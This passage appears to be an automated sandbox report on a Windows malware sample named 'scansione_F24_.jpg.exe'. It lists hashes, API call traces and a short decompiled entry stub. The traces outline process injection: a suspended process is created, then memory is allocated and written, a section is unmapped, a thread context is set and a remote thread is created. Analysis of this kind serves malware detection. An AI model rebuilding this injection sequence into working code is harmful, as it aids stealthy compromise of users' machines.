  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				// Image base of the running module, passed on to the main routine.
				_t4 = GetModuleHandleA(0); // executed
				// Private growable heap (maximum size 0), 64 KiB initial size.
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					// Main routine: starts two worker threads and waits on them (see subcalls below).
					_t3 = E00401639(_t2, _t4); // executed
				}
				// The error code, or the main routine's result, becomes the thread exit code.
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 2
  • API ID: RtlFreeAnsiStringRtlUpcaseUnicodeString
  • String ID: pnls
  • API String ID: 1759152104-141991303
  • Opcode ID: 1b851152067a6db6879b83e6b25959da6169a9d8602d5776354d9100e82b9d64
  • Instruction ID: c9f23dce73c85179fe8b2af871d3216cca9706f8479e6acea818e7f13d9a5d0a
  • Opcode Fuzzy Hash: C7E02B414545A2D794036880C3546C667839757705F0CE50181C6E49591E24747BFF48
  • Instruction Fuzzy Hash: c9f23dce73c85179fe8b2af871d3216cca9706f8479e6acea818e7f13d9a5d0a
APIs
  • RtlUpcaseUnicodeString.NTDLL(?,002E74CC,00000001), ref: 002E1561
    • Part of subcall function 002E1395: memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E1395: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
    • Part of subcall function 002E1395: GetLastError.KERNEL32(00000001), ref: 002E1422
    • Part of subcall function 002E1395: HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E2427: OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
    • Part of subcall function 002E2427: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
    • Part of subcall function 002E2427: CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
    • Part of subcall function 002E2427: GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E2427: CloseHandle.KERNEL32(?), ref: 002E24E0
    • Part of subcall function 002E2427: GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
  • RtlFreeAnsiString.NTDLL(?), ref: 002E15DF
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:E5C7B986B6FD3733504DB3FD6D6FAADA
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:68428
Initial sample SHA 256:9D2D7459EDA5BC0063FC6EF47DE20AFBFA28AA6981F0EE63D90AE3E10EC4F835
Initial sample name:scansione_F24_.jpg.exe

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
